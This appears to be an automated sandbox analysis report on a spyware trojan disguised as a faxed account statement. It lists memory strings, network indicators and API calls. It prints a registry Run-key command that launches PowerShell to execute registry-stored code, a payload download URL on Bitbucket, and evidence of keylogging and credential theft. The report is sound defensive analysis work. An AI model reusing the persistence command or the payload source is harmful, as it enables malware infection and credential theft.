            Source: bhv4D96.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpxe
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe, Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: bhv4D96.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
            Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2363320807.000000000332D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2363339733.000000000332D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: msiexec.exe, 00000006.00000002.2908274107.0000000024EA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: msiexec.exe, 00000006.00000002.2908274107.0000000024EA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: msiexec.exe, 0000000E.00000003.2363320807.000000000332D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2363339733.000000000332D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
            Source: msiexec.exe, 0000000B.00000002.2371823690.0000000002CF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
            Source: msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
            Source: msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
            Source: msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
            Source: msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
            Source: msiexec.exe, 00000006.00000003.2323385728.0000000009113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public
            Source: msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
            Source: msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
            Source: msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
            Source: msiexec.exe, 00000006.00000003.2323385728.0000000009113000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/867721d9-89d
            Source: msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/867721d9-89d1-453c-b9b8-34e13023a504/downloads/8215feab-9e36-
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/a
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/~
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
            Source: msiexec.exe, 00000006.00000002.2896774357.000000000907A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2907962080.0000000024950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/priestoph/new/downloads/rLjwANQEhWrjdfkI49.bin
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/priestoph/new/downloads/rLjwANQEhWrjdfkI49.bin6Yd?
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/priestoph/new/downloads/rLjwANQEhWrjdfkI49.bin7
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
            Source: msiexec.exe, 0000000B.00000002.2372627238.0000000002FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: msiexec.exe, 0000000B.00000002.2372627238.0000000002FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: msiexec.exe, 0000000B.00000003.2371443410.000000000319A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2372859595.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
            Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.0000000009108000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310414987.000000000914E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2310357348.000000000914E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
            Source: msiexec.exe, 00000006.00000003.2310357348.0000000009110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;9
            Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.217.199.81:443 -> 192.168.2.4:49769 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_0040987A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3052, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\alepoty.dat, type: DROPPED

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeJump to dropped file
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_00406D5F0_2_00406D5F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24EDB5C16_2_24EDB5C1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24EE71946_2_24EE7194
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B04011_2_0044B040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043610D11_2_0043610D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044731011_2_00447310
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044A49011_2_0044A490
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040755A11_2_0040755A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043C56011_2_0043C560
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B61011_2_0044B610
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044D6C011_2_0044D6C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004476F011_2_004476F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B87011_2_0044B870
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044081D11_2_0044081D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041495711_2_00414957
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004079EE11_2_004079EE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407AEB11_2_00407AEB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044AA8011_2_0044AA80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00412AA911_2_00412AA9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00404B7411_2_00404B74
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00404B0311_2_00404B03
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044BBD811_2_0044BBD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00404BE511_2_00404BE5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00404C7611_2_00404C76
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00415CFE11_2_00415CFE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00416D7211_2_00416D72
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00446D3011_2_00446D30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00446D8B11_2_00446D8B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00406E8F11_2_00406E8F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040503812_2_00405038
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041208C12_2_0041208C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004050A912_2_004050A9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040511A12_2_0040511A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043C13A12_2_0043C13A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004051AB12_2_004051AB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044930012_2_00449300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040D32212_2_0040D322
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A4F012_2_0044A4F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043A5AB12_2_0043A5AB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041363112_2_00413631
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044669012_2_00446690
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A73012_2_0044A730
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004398D812_2_004398D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004498E012_2_004498E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A88612_2_0044A886
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043DA0912_2_0043DA09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00438D5E12_2_00438D5E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00449ED012_2_00449ED0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041FE8312_2_0041FE83
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00430F5412_2_00430F54
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004050C214_2_004050C2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004014AB14_2_004014AB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040513314_2_00405133
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004051A414_2_004051A4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040124614_2_00401246
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040CA4614_2_0040CA46
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040523514_2_00405235
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004032C814_2_004032C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040168914_2_00401689
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402F6014_2_00402F60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeStatic PE information: invalid certificate
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe, 00000000.00000000.1643505274.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamestivning.exe0 vs Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeBinary or memory string: OriginalFilenamestivning.exe0 vs Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe.1.drBinary or memory string: OriginalFilenamestivning.exe0 vs Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/21@4/4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,11_2_004182CE
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,11_2_00413D4C
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,11_2_004148B6
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeFile created: C:\Users\user\AppData\Roaming\floddeltaersJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:932:120:WilError_03
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\kwelpdeosgb-03CUXG
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeFile created: C:\Users\user\AppData\Local\Temp\nsl3495.tmpJump to behavior
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: msiexec.exe, msiexec.exe, 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: msiexec.exe, 00000006.00000002.2908677481.0000000025730000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: msiexec.exe, msiexec.exe, 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: msiexec.exe, msiexec.exe, 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: msiexec.exe, msiexec.exe, 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
